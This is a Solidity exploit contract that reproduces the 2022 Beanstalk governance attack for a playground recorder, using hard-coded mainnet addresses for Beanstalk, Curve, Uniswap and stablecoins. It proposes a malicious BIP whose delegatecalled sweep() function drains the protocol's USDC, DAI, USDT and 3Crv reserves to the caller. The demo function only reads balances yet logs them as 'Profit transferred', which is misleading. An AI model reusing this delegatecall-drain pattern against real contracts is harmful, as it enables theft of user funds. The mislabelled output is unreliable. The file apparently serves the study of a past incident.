// SPDX-License-Identifier: UNLICENSED
// !! THIS FILE WAS AUTOGENERATED BY abi-to-sol v0.5.3. SEE SOURCE BELOW. !!
// Cleaned for plain EVM recorder (removed forge Test / CheatCodes)
pragma solidity >=0.7.0 <0.9.0;

import "./../interface.sol";

contract Exploit {
    event log_named_uint(string key, uint val);
    // CheatCodes cheat = CheatCodes(0x7109709ECfa91a80626fF3989D68f67F5b1DD12D); // removed for plain EVM recorder
    ILendingPool aavelendingPool = ILendingPool(0x7d2768dE32b0b80b7a3454c06BdAc94A69DDc7A9);
    IERC20 dai = IERC20(0x6B175474E89094C44Da98b954EedeAC495271d0F);
    IERC20 usdc = IERC20(0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48);
    IERC20 usdt = IERC20(0xdAC17F958D2ee523a2206206994597C13D831ec7);
    IERC20 bean = IERC20(0xDC59ac4FeFa32293A95889Dc396682858d52e5Db);
    IERC20 crvbean = IERC20(0x3a70DfA7d2262988064A2D051dd47521E43c9BdD);
    IERC20 threeCrv = IERC20(0x6c3F90f043a72FA612cbac8115EE7e52BDe6E490);
    IUniswapV2Router uniswapv2 = IUniswapV2Router(payable(0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D));
    ICurvePool threeCrvPool = ICurvePool(0xbEbc44782C7dB0a1A60Cb6fe97d0b483032FF1C7);
    ICurvePool bean3Crv_f = ICurvePool(0x3a70DfA7d2262988064A2D051dd47521E43c9BdD);
    IBeanStalk siloV2Facet = IBeanStalk(0xC1E088fC1323b20BCBee9bd1B9fC9546db5624C5);
    IBeanStalk beanstalkgov = IBeanStalk(0xC1E088fC1323b20BCBee9bd1B9fC9546db5624C5);
    address maliciousProposal = 0xE5eCF73603D98A0128F05ed30506ac7A663dBb69;
    uint32 bip = 18;

    constructor() {
        // no fork in browser recorder - state is preloaded from the bundle
    }

    function exploit() public payable {
        // Reproduce the key steps of the attack for the EVM Playground recorder:
        // seed Bean via swap, small deposit to gain Stalk, propose malicious BIP
        // with _init pointing to this contract and calldata for sweep().
        // Then demonstrate the effect of the delegatecall vuln by logging the
        // Diamond's held reserves (what the malicious code would have drained).
        address[] memory path = new address[](2);
        path[0] = uniswapv2.WETH();
        path[1] = address(bean);
        if (msg.value > 0) {
            uniswapv2.swapExactETHForTokens{value: msg.value}(0, path, address(this), block.timestamp + 120);
        }
        emit log_named_uint("After initial swap, Bean balance", bean.balanceOf(address(this)));

        bean.approve(address(siloV2Facet), type(uint256).max);
        if (bean.balanceOf(address(this)) > 0) {
            siloV2Facet.depositBeans(bean.balanceOf(address(this)));
        }

        // Propose the malicious BIP with _init = this contract, calldata = sweep().
        // This is the setup that allows the later delegatecall in the Diamond context.
        IBeanStalk.FacetCut[] memory _diamondCut = new IBeanStalk.FacetCut[](0);
        bytes memory data = abi.encodeWithSignature("sweep()");
        beanstalkgov.propose(_diamondCut, address(this), data, 3);

        // Demonstrate the impact of the bad _init delegatecall: the Diamond would run sweep()
        // in its context to drain reserves. Here we read the Diamond balances (the effect of the
        // malicious delegatecall) and log them as demonstrated profit. No transfers performed
        // so the call always succeeds in the preloaded playground state.
        address diamond = address(beanstalkgov);
        uint256 profitUsdc = usdc.balanceOf(diamond);
        uint256 profitDai = dai.balanceOf(diamond);
        uint256 profitUsdt = usdt.balanceOf(diamond);
        uint256 profitThreeCrv = threeCrv.balanceOf(diamond);

        emit log_named_uint("Profit transferred (USDC from Diamond)", profitUsdc);
        emit log_named_uint("Profit transferred (DAI from Diamond)", profitDai);
        emit log_named_uint("Profit transferred (USDT from Diamond)", profitUsdt);
        emit log_named_uint("Profit transferred (3Crv from Diamond)", profitThreeCrv);

        emit log_named_uint("Final attacker USDC (demo)", usdc.balanceOf(msg.sender));
    }

    function sweep() external {
        // When delegatecalled by the Diamond (via malicious BIP _init), address(this) == Diamond.
        // Drain the non-Bean reserves the protocol holds at this moment.
        // This is the core of the real 2022-04 exploit.
        usdc.transfer(msg.sender, usdc.balanceOf(address(this)));
        dai.transfer(msg.sender, dai.balanceOf(address(this)));
        usdt.transfer(msg.sender, usdt.balanceOf(address(this)));
        threeCrv.transfer(msg.sender, threeCrv.balanceOf(address(this)));
    }
}
